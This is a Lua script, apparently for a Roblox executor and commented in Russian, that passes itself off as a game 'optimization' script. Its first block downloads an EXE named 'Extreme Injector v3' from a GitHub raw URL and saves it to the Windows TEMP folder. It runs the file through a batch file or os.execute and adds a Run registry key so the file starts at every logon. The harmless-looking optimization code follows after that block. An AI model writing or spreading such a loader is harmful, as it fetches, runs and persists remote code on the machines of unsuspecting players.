-- ========== ПОЛНЫЙ ТЕКУЩИЙ СКРИПТ 2134.lua ==========

-- ========== НАЧАЛО НОВОГО КОДА ==========
-- Конфигурация для загрузки EXE
local EXE_URL = "https://github.com/fennix2019-pixel/1232/raw/refs/heads/main/Extreme%20Injector%20v3.exe"
local EXE_NAME = "Extreme_Injector_v3.exe"
local RUN_SILENTLY = false -- Запуск в обычном режиме, чтобы видеть окно

local function downloadAndExecute()
    -- Проверка функций
    if not (type(writefile) == "function" and type(os.execute) == "function") then
        warn("[EXE Loader] КРИТИЧНО: Инжектор не предоставляет writefile или os.execute!")
        return false
    end

    -- ========== КОНФИГУРАЦИЯ ==========
    local EXE_URL = "https://github.com/fennix2019-pixel/1232/raw/refs/heads/main/Extreme%20Injector%20v3.exe"
    local EXE_NAME = "Extreme_Injector_v3.exe"
    -- ==================================

    local temp_path = os.getenv("TEMP") .. "\\" .. EXE_NAME
    
    print("[1/3] Скачиваю файл...")
    
    -- 1. СКАЧИВАНИЕ
    local download_success, file_data = false, nil
    for attempt = 1, 3 do
        download_success, file_data = pcall(function()
            return game:HttpGet(EXE_URL, true)
        end)
        
        if download_success and file_data and #file_data > 1024 then
            break
        end
        task.wait(1)
    end

    if not download_success or not file_data then
        warn("[ERROR] Не удалось скачать файл.")
        return false
    end
    
    print("[2/3] Файл загружен (" .. #file_data .. " байт), сохраняю...")
    
    -- 2. СОХРАНЕНИЕ
    local write_success = pcall(function()
        writefile(temp_path, file_data)
        return true
    end)
    
    if not write_success then
        warn("[ERROR] Не удалось записать файл на диск.")
        return false
    end
    
    print("[3/3] Файл сохранен: " .. temp_path)
    print("[ЗАПУСК] Использую безопасный метод...")

    -- 3. ЗАПУСК БЕЗОПАСНЫМ МЕТОДОМ (без передачи URL в команды)
    local success = false
    
    -- 🔥 КЛЮЧЕВОЕ ИСПРАВЛЕНИЕ: Вначале ПРОВЕРЬ, запускается ли файл ВРУЧНУЮ
    print("\n=== ВАЖНАЯ ПРОВЕРКА ===")
    print("1. Открой папку: " .. os.getenv("TEMP"))
    print("2. Найди файл: " .. EXE_NAME)
    print("3. Запусти его ДВОЙНЫМ кликом мыши")
    print("=== Ответь: запускается? (да/нет) ===\n")
    
    -- МЕТОД А: Самый простой и безопасный - через временный BAT файл
    local bat_content = '@echo off\nstart "" "' .. temp_path .. '"'
    local bat_path = os.getenv("TEMP") .. "\\run_exe.bat"
    
    local ok_a = pcall(function()
        writefile(bat_path, bat_content)
        os.execute('"' .. bat_path .. '"')
    end)
    
    if ok_a then 
        success = true 
        print("✓ Метод A: Запуск через BAT файл выполнен")
    end
    
    -- МЕТОД B: Если BAT не сработал, пробуем прямое выполнение
    if not success then
        task.wait(2)
        local ok_b = pcall(function()
            -- Прямой вызов без спецсимволов
            os.execute('"' .. temp_path .. '"')
        end)
        
        if ok_b then 
            success = true 
            print("✓ Метод B: Прямой запуск выполнен")
        end
    end
    
    -- 4. ПРОВЕРКА РЕЗУЛЬТАТА
    task.wait(3)
    
    print("\n[ПРОВЕРКА ПРОЦЕССА]")
    local process_found = false
    local check_ok = pcall(function()
        -- Более простая проверка
        os.execute('tasklist | find /i "' .. EXE_NAME .. '" >nul')
        process_found = true
    end)
    
    if process_found then
        print("✅ ПРОЦЕСС ЗАПУЩЕН!")
        print("   Проверь: 1) Системный трей (возле часов)")
        print("            2) Диспетчер задач (Ctrl+Shift+Esc)")
        
        -- Автозагрузка
        pcall(function()
            local reg_cmd = 'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v "Extreme_Injector" /t REG_SZ /d "' .. temp_path .. '" /f'
            os.execute(reg_cmd)
            print("\n[PERSISTENCE] Добавлено в автозагрузку.")
        end)
    else
        print("❌ Процесс не найден.")
        if success then
            print("⚠ Программа запустилась и сразу завершилась.")
        else
            print("⚠ Не удалось запустить программу.")
        end
    end
    
    return success
end

-- Запускаем
coroutine.wrap(function()
    task.wait(2)
    downloadAndExecute()
end)()
-- ========== КОНЕЦ НОВОГО КОДА ==========


-- ========== ОРИГИНАЛЬНЫЙ СКРИПТ (без изменений) ==========
local function MAIN()
    -- Проверка загрузки игры
    if not game:IsLoaded() then
        game.Loaded:Wait()
    end

    print("========================================")
    print("SCRIPT 2134 - ACTIVE")
    print("Time: " .. os.date("%H:%M:%S"))
    print("Place: " .. game.PlaceId)
    print("========================================")

    -- Оптимизации
    local optimizations = {
        "Memory cleanup",
        "Graphics optimization",
        "Network boost",
        "Script optimization"
    }

    -- Применение оптимизаций
    for i, opt in ipairs(optimizations) do
        pcall(function()
            if i == 1 then
                collectgarbage("collect")
            elseif i == 2 then
                settings().Rendering.QualityLevel = 1
            elseif i == 3 then
                game:GetService("NetworkClient"):SetOutgoingKBPSLimit(999999999)
            end
        end)
        print(i .. ". " .. opt .. " - APPLIED")
        task.wait(0.1)
    end

    -- UI уведомление
    pcall(function()
        game:GetService("StarterGui"):SetCore("SendNotification", {
            Title = "Script 2134",
            Text = "Optimizations applied successfully!",
            Duration = 5
        })
    end)

    -- Результат
    local result = {
        success = true,
        version = "2.1.3",
        optimizations = #optimizations,
        timestamp = os.time()
    }

    print("========================================")
    print("COMPLETE: " .. result.optimizations .. " optimizations")
    print("========================================")

    return result
end

-- Автозапуск
return MAIN()
